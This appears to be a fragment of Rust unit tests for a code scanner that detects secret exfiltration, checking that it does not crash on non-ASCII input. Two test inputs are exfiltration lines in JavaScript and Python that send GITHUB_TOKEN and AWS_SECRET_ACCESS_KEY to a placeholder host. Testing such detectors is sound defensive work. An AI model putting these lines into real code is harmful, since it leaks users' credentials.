        let input = r#"fetch("https://api.example.com/═══", {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
        let _ = check(input, Some("test.js"));
    }

    #[test]
    fn test_py_exfil_no_panic_on_non_ascii_args() {
        let input = r#"requests.post("https://api.example.com/═══", data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
        let _ = check(input, Some("test.py"));
    }

    #[test]
    fn test_scan_plain_python_with_box_drawing_no_panic() {
        let mut input = String::from("# ");
        input.push_str(&"═".repeat(250));
        input.push_str("\nprint('hello')\n");
        let findings = check(&input, Some("test.py"));
        assert!(
            findings.is_empty(),
            "plain file with only box-drawing chars should produce no findings, got {findings:?}"
        );
    }
}